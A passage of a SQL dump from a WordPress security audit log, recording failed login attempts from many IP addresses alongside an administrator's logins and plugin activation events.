Firefox/40.0'),(410,94,'CurrentUserID','0'),(411,95,'Attempts','1'),(412,95,'ClientIP','50.97.178.250'),(413,95,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(414,95,'CurrentUserID','0'),(415,96,'Attempts','1'),(416,96,'ClientIP','78.40.120.230'),(417,96,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(418,96,'CurrentUserID','0'),(419,97,'Attempts','1'),(420,97,'ClientIP','192.40.114.82'),(421,97,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(422,97,'CurrentUserID','0'),(423,98,'Attempts','1'),(424,98,'ClientIP','217.174.242.9'),(425,98,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(426,98,'CurrentUserID','0'),(427,99,'Attempts','1'),(428,99,'ClientIP','69.175.41.2'),(429,99,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(430,99,'CurrentUserID','0'),(431,100,'Attempts','2'),(432,100,'ClientIP','188.165.118.117'),(433,100,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(434,100,'CurrentUserID','0'),(435,101,'Attempts','1'),(436,101,'ClientIP','96.127.132.58'),(437,101,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(438,101,'CurrentUserID','0'),(439,102,'Attempts','2'),(440,102,'ClientIP','173.199.176.200'),(441,102,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(442,102,'CurrentUserID','0'),(443,103,'Attempts','1'),(444,103,'ClientIP','23.245.96.111'),(445,103,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(446,103,'CurrentUserID','0'),(447,104,'Attempts','2'),(448,104,'ClientIP','173.199.143.37'),(449,104,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(450,104,'CurrentUserID','0'),(451,105,'Attempts','1'),(452,105,'ClientIP','176.31.103.124'),(453,105,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(454,105,'CurrentUserID','0'),(455,106,'Attempts','1'),(456,106,'ClientIP','103.231.43.233'),(457,106,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(458,106,'CurrentUserID','0'),(459,107,'Attempts','1'),(460,107,'ClientIP','217.33.74.31'),(461,107,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(462,107,'CurrentUserID','0'),(463,108,'Attempts','1'),(464,108,'ClientIP','96.127.172.98'),(465,108,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(466,108,'CurrentUserID','0'),(467,109,'Attempts','1'),(468,109,'ClientIP','81.21.67.66'),(469,109,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(470,109,'CurrentUserID','0'),(471,110,'Attempts','1'),(472,110,'ClientIP','200.29.169.242'),(473,110,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(474,110,'CurrentUserID','0'),(475,111,'Attempts','1'),(476,111,'ClientIP','198.12.152.170'),(477,111,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(478,111,'CurrentUserID','0'),(479,112,'Attempts','1'),(480,112,'ClientIP','97.79.236.99'),(481,112,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(482,112,'CurrentUserID','0'),(483,113,'Attempts','1'),(484,113,'ClientIP','5.9.213.43'),(485,113,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(486,113,'CurrentUserID','0'),(487,114,'Username','Olli'),(488,114,'CurrentUserRoles','a:3:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";i:2;s:10:\"superadmin\";}'),(489,114,'ClientIP','5.147.41.205'),(490,114,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(491,115,'Attempts','1'),(492,115,'ClientIP','173.236.54.162'),(493,115,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(494,115,'CurrentUserID','0'),(495,116,'Attempts','1'),(496,116,'ClientIP','52.28.24.100'),(497,116,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(498,116,'CurrentUserID','0'),(499,117,'Username','Olli'),(500,117,'CurrentUserRoles','a:3:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";i:2;s:10:\"superadmin\";}'),(501,117,'ClientIP','5.147.41.205'),(502,117,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(503,118,'Attempts','1'),(504,118,'ClientIP','66.35.94.120'),(505,118,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(506,118,'CurrentUserID','0'),(507,119,'Attempts','1'),(508,119,'ClientIP','81.21.70.227'),(509,119,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(510,119,'CurrentUserID','0'),(511,120,'Attempts','1'),(512,120,'ClientIP','198.1.71.253'),(513,120,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(514,120,'CurrentUserID','0'),(515,121,'Attempts','1'),(516,121,'ClientIP','93.174.141.51'),(517,121,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(518,121,'CurrentUserID','0'),(519,122,'Attempts','1'),(520,122,'ClientIP','198.12.152.170'),(521,122,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(522,122,'CurrentUserID','0'),(523,123,'Attempts','1'),(524,123,'ClientIP','104.219.251.2'),(525,123,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(526,123,'CurrentUserID','0'),(527,124,'Attempts','1'),(528,124,'ClientIP','151.236.47.221'),(529,124,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(530,124,'CurrentUserID','0'),(531,125,'Attempts','1'),(532,125,'ClientIP','184.154.124.2'),(533,125,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(534,125,'CurrentUserID','0'),(535,126,'Attempts','1'),(536,126,'ClientIP','83.223.124.24'),(537,126,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(538,126,'CurrentUserID','0'),(539,127,'Attempts','2'),(540,127,'ClientIP','72.9.155.235'),(541,127,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(542,127,'CurrentUserID','0'),(543,128,'Username','Olli'),(544,128,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(545,128,'ClientIP','5.147.41.205'),(546,128,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(547,129,'PluginFile','/var/www/wordpress/wp-content/plugins/advanced-ads/advanced-ads.php'),(548,129,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:12:\"Advanced Ads\";s:9:\"PluginURI\";s:25:\"https://wpadvancedads.com\";s:7:\"Version\";s:6:\"1.6.12\";s:6:\"Author\";s:12:\"Thomas Maier\";s:7:\"Network\";s:5:\"False\";}'),(549,129,'ClientIP','5.147.41.205'),(550,129,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(551,129,'CurrentUserID','2'),(552,129,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(553,130,'PluginFile','/var/www/wordpress/wp-content/plugins/advanced-ads-responsive/responsive-ads.php'),(554,130,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:31:\"Advanced Ads – Responsive Ads\";s:9:\"PluginURI\";s:40:\"http://wpadvancedads.com/responsive-ads/\";s:7:\"Version\";s:5:\"1.2.0\";s:6:\"Author\";s:12:\"Thomas Maier\";s:7:\"Network\";s:5:\"False\";}'),(555,130,'ClientIP','5.147.41.205'),(556,130,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(557,130,'CurrentUserID','2'),(558,130,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(559,131,'PluginFile','/var/www/wordpress/wp-content/plugins/multi-author-adsense/index.php'),(560,131,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:20:\"Multi-Author AdSense\";s:9:\"PluginURI\";s:57:\"http://thepluginfactory.co/warehouse/multi-author-adsense\";s:7:\"Version\";s:3:\"1.0\";s:6:\"Author\";s:18:\"The Plugin Factory\";s:7:\"Network\";s:5:\"False\";}'),(561,131,'ClientIP','5.147.41.205'),(562,131,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(563,131,'CurrentUserID','2'),(564,131,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(565,132,'PluginFile','/var/www/wordpress/wp-content/plugins/phpsword-favicon-manager/index.php'),(566,132,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:24:\"PhpSword Favicon Manager\";s:9:\"PluginURI\";s:60:\"https://69plugins.com/free-plugins/phpsword-favicon-manager/\";s:7:\"Version\";s:3:\"1.0\";s:6:\"Author\";s:17:\"Pradnyankur Nikam\";s:7:\"Network\";s:5:\"False\";}'),(567,132,'ClientIP','5.147.41.205'),(568,132,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(569,132,'CurrentUserID','2'),(570,132,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(571,133,'PluginFile','/var/www/wordpress/wp-content/plugins/smooth-slider/smooth-slider.php'),(572,133,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:13:\"Smooth Slider\";s:9:\"PluginURI\";s:37:\"http://slidervilla.com/smooth-slider/\";s:7:\"Version\";s:5:\"2.8.1\";s:6:\"Author\";s:11:\"SliderVilla\";s:7:\"Network\";s:5:\"False\";}'),(573,133,'ClientIP','5.147.41.205'),(574,133,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(575,133,'CurrentUserID','2'),(576,133,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(577,134,'PluginFile','/var/www/wordpress/wp-content/plugins/wp-security-audit-log/wp-security-audit-log.php'),(578,134,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:21:\"WP Security Audit Log\";s:9:\"PluginURI\";s:34:\"http://www.wpsecurityauditlog.com/\";s:7:\"Version\";s:3:\"2.2\";s:6:\"Author\";s:17:\"WP White Security\";s:7:\"Network\";s:5:\"False\";}'),(579,134,'ClientIP','5.147.41.205'),(580,134,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(581,134,'CurrentUserID','2'),(582,134,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(583,135,'PluginFile','/var/www/wordpress/wp-content/plugins/advanced-ads-responsive/responsive-ads.php'),(584,135,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:31:\"Advanced Ads – Responsive Ads\";s:9:\"PluginURI\";s:40:\"http://wpadvancedads.com/responsive-ads/\";s:7:\"Version\";s:5:\"1.2.0\";s:6:\"Author\";s:12:\"Thomas Maier\";s:7:\"Network\";s:5:\"False\";}'),(585,135,'ClientIP','5.147.41.205'),(586,135,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(587,135,'CurrentUserID','2'),(588,135,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(589,136,'PluginFile','/var/www/wordpress/wp-content/plugins/advanced-ads/advanced-ads.php'),(590,136,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:12:\"Advanced Ads\";s:9:\"PluginURI\";s:25:\"https://wpadvancedads.com\";s:7:\"Version\";s:6:\"1.6.12\";s:6:\"Author\";s:12:\"Thomas Maier\";s:7:\"Network\";s:5:\"False\";}'),(591,136,'ClientIP','5.147.41.205'),(592,136,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(593,136,'CurrentUserID','2'),(594,136,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(595,137,'Username','Olli'),(596,137,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(597,137,'ClientIP','5.147.41.205'),(598,137,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(599,138,'PluginFile','/var/www/wordpress/wp-content/plugins/akismet/akismet.php'),(600,138,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:7:\"Akismet\";s:9:\"PluginURI\";s:19:\"http://akismet.com/\";s:7:\"Version\";s:5:\"3.1.3\";s:6:\"Author\";s:10:\"Automattic\";s:7:\"Network\";s:5:\"False\";}'),(601,138,'ClientIP','5.147.41.205'),(602,138,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(603,138,'CurrentUserID','2'),(604,138,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(605,139,'PluginFile','/var/www/wordpress/wp-content/plugins/akismet/akismet.php'),(606,139,'PluginData','O:8:\"stdClass\":1:{s:4:\"Name\";s:7:\"Akismet\";}'),(607,139,'ClientIP','5.147.41.205'),(608,139,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(609,139,'CurrentUserID','2'),(610,139,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(611,140,'PluginFile','/var/www/wordpress/wp-content/plugins/akismet/akismet.php'),(612,140,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:7:\"Akismet\";s:9:\"PluginURI\";s:19:\"http://akismet.com/\";s:7:\"Version\";s:5:\"3.1.3\";s:6:\"Author\";s:10:\"Automattic\";s:7:\"Network\";s:5:\"False\";}'),(613,140,'ClientIP','5.147.41.205'),(614,140,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(615,140,'CurrentUserID','2'),(616,140,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(617,141,'PluginFile','/var/www/wordpress/wp-content/plugins/akismet/akismet.php'),(618,141,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:7:\"Akismet\";s:9:\"PluginURI\";s:19:\"http://akismet.com/\";s:7:\"Version\";s:5:\"3.1.3\";s:6:\"Author\";s:10:\"Automattic\";s:7:\"Network\";s:5:\"False\";}'),(619,141,'ClientIP','5.147.41.205'),(620,141,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(621,141,'CurrentUserID','2'),(622,141,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(623,142,'PluginFile','/var/www/wordpress/wp-content/plugins/akismet/akismet.php'),(624,142,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:7:\"Akismet\";s:9:\"PluginURI\";s:19:\"http://akismet.com/\";s:7:\"Version\";s:5:\"3.1.3\";s:6:\"Author\";s:10:\"Automattic\";s:7:\"Network\";s:5:\"False\";}'),(625,142,'ClientIP','5.147.41.205'),(626,142,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(627,142,'CurrentUserID','2'),(628,142,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(629,143,'PluginFile','/var/www/wordpress/wp-content/plugins/akismet/akismet.php'),(630,143,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:7:\"Akismet\";s:9:\"PluginURI\";s:19:\"http://akismet.com/\";s:7:\"Version\";s:5:\"3.1.3\";s:6:\"Author\";s:10:\"Automattic\";s:7:\"Network\";s:5:\"False\";}'),(631,143,'ClientIP','5.147.41.205'),(632,143,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(633,143,'CurrentUserID','2'),(634,143,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(635,144,'PluginFile','/var/www/wordpress/wp-content/plugins/akismet/akismet.php'),(636,144,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:7:\"Akismet\";s:9:\"PluginURI\";s:19:\"http://akismet.com/\";s:7:\"Version\";s:5:\"3.1.3\";s:6:\"Author\";s:10:\"Automattic\";s:7:\"Network\";s:5:\"False\";}'),(637,144,'ClientIP','5.147.41.205'),(638,144,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(639,144,'CurrentUserID','2'),(640,144,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(641,145,'PluginFile','/var/www/wordpress/wp-content/plugins/akismet/akismet.php'),(642,145,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:7:\"Akismet\";s:9:\"PluginURI\";s:19:\"http://akismet.com/\";s:7:\"Version\";s:5:\"3.1.3\";s:6:\"Author\";s:10:\"Automattic\";s:7:\"Network\";s:5:\"False\";}'),(643,145,'ClientIP','5.147.41.205'),(644,145,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(645,145,'CurrentUserID','2'),(646,145,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(647,146,'PluginFile','/var/www/wordpress/wp-content/plugins/akismet/akismet.php'),(648,146,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:7:\"Akismet\";s:9:\"PluginURI\";s:19:\"http://akismet.com/\";s:7:\"Version\";s:5:\"3.1.3\";s:6:\"Author\";s:10:\"Automattic\";s:7:\"Network\";s:5:\"False\";}'),(649,146,'ClientIP','5.147.41.205'),(650,146,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(651,146,'CurrentUserID','2'),(652,146,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(653,147,'PluginFile','/var/www/wordpress/wp-content/plugins/akismet/akismet.php'),(654,147,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:7:\"Akismet\";s:9:\"PluginURI\";s:19:\"http://akismet.com/\";s:7:\"Version\";s:5:\"3.1.3\";s:6:\"Author\";s:10:\"Automattic\";s:7:\"Network\";s:5:\"False\";}'),(655,147,'ClientIP','5.147.41.205'),(656,147,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(657,147,'CurrentUserID','2'),(658,147,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(659,148,'PluginFile','/var/www/wordpress/wp-content/plugins/akismet/akismet.php'),(660,148,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:7:\"Akismet\";s:9:\"PluginURI\";s:19:\"http://akismet.com/\";s:7:\"Version\";s:5:\"3.1.3\";s:6:\"Author\";s:10:\"Automattic\";s:7:\"Network\";s:5:\"False\";}'),(661,148,'ClientIP','5.147.41.205'),(662,148,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(663,148,'CurrentUserID','2'),(664,148,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(665,149,'PluginFile','/var/www/wordpress/wp-content/plugins/akismet/akismet.php'),(666,149,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:7:\"Akismet\";s:9:\"PluginURI\";s:19:\"http://akismet.com/\";s:7:\"Version\";s:5:\"3.1.3\";s:6:\"Author\";s:10:\"Automattic\";s:7:\"Network\";s:5:\"False\";}'),(667,149,'ClientIP','5.147.41.205'),(668,149,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(669,149,'CurrentUserID','2'),(670,149,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(671,150,'Attempts','1'),(672,150,'ClientIP','65.99.201.29'),(673,150,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(674,150,'CurrentUserID','0'),(675,151,'Attempts','1'),(676,151,'ClientIP','96.127.172.98'),(677,151,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(678,151,'CurrentUserID','0'),(679,152,'Attempts','1'),(680,152,'ClientIP','66.45.228.80'),(681,152,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(682,152,'CurrentUserID','0'),(683,153,'Attempts','1'),(684,153,'ClientIP','184.170.151.20'),(685,153,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(686,153,'CurrentUserID','0'),(687,154,'Attempts','1'),(688,154,'ClientIP','173.214.189.213'),(689,154,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(690,154,'CurrentUserID','0'),(691,155,'Attempts','1'),(692,155,'ClientIP','107.6.46.36'),(693,155,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(694,155,'CurrentUserID','0'),(695,156,'PluginFile','/var/www/wordpress/wp-content/plugins/akismet/akismet.php'),(696,156,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:7:\"Akismet\";s:9:\"PluginURI\";s:19:\"http://akismet.com/\";s:7:\"Version\";s:5:\"3.1.3\";s:6:\"Author\";s:10:\"Automattic\";s:7:\"Network\";s:5:\"False\";}'),(697,156,'ClientIP','5.147.41.205'),(698,156,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(699,156,'CurrentUserID','2'),(700,156,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(701,157,'Attempts','1'),(702,157,'ClientIP','184.154.42.98'),(703,157,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(704,157,'CurrentUserID','0'),(705,158,'PluginFile','/var/www/wordpress/wp-content/plugins/akismet/akismet.php'),(706,158,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:7:\"Akismet\";s:9:\"PluginURI\";s:19:\"http://akismet.com/\";s:7:\"Version\";s:5:\"3.1.3\";s:6:\"Author\";s:10:\"Automattic\";s:7:\"Network\";s:5:\"False\";}'),(707,158,'ClientIP','5.147.41.205'),(708,158,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(709,158,'CurrentUserID','2'),(710,158,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(711,159,'PluginFile','/var/www/wordpress/wp-content/plugins/akismet/akismet.php'),(712,159,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:7:\"Akismet\";s:9:\"PluginURI\";s:19:\"http://akismet.com/\";s:7:\"Version\";s:5:\"3.1.5\";s:6:\"Author\";s:10:\"Automattic\";s:7:\"Network\";s:5:\"False\";}'),(713,159,'ClientIP','5.147.41.205'),(714,159,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(715,159,'CurrentUserID','2'),(716,159,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(717,160,'Username','Olli'),(718,160,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(719,160,'ClientIP','5.147.41.205'),(720,160,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(721,161,'Username','Olli'),(722,161,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(723,161,'ClientIP','5.147.41.205'),(724,161,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(725,162,'Plugin','O:8:\"stdClass\":6:{s:4:\"Name\";s:24:\"Jetpack by WordPress.com\";s:9:\"PluginURI\";s:17:\"http://jetpack.me\";s:7:\"Version\";s:5:\"3.8.0\";s:6:\"Author\";s:10:\"Automattic\";s:7:\"Network\";s:5:\"False\";s:15:\"plugin_dir_path\";s:38:\"/var/www/wordpress/wp-content/plugins/\";}'),(726,162,'ClientIP','5.147.41.205'),(727,162,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(728,162,'CurrentUserID','2'),(729,162,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(730,163,'PluginFile','/var/www/wordpress/wp-content/plugins/jetpack/jetpack.php'),(731,163,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:24:\"Jetpack by WordPress.com\";s:9:\"PluginURI\";s:17:\"http://jetpack.me\";s:7:\"Version\";s:5:\"3.8.0\";s:6:\"Author\";s:10:\"Automattic\";s:7:\"Network\";s:5:\"False\";}'),(732,163,'ClientIP','5.147.41.205'),(733,163,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(734,163,'CurrentUserID','2'),(735,163,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(736,164,'Attempts','1'),(737,164,'ClientIP','89.140.136.75'),(738,164,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'),(739,164,'CurrentUserID','0'),(740,165,'Username','Olli'),(741,165,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(742,165,'ClientIP','5.147.41.205'),(743,165,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 